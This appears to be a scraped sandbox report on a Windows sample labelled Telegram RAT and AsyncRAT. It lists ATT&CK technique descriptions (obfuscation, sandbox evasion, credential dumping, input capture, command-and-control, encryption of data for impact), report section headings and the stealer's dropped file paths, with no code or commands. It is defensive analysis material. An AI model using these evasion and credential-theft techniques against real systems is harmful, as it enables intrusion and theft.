Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Kh7W85ONS7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: AsyncRAT

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH.zip

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Browsers\Firefox\Bookmarks.txt

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Directories\Desktop.txt

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Directories\Documents.txt

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Directories\Downloads.txt

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Directories\OneDrive.txt

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Directories\Pictures.txt

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Directories\Startup.txt

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Directories\Temp.txt

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Directories\Videos.txt

Windows Analysis Report
Kh7W85ONS7.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre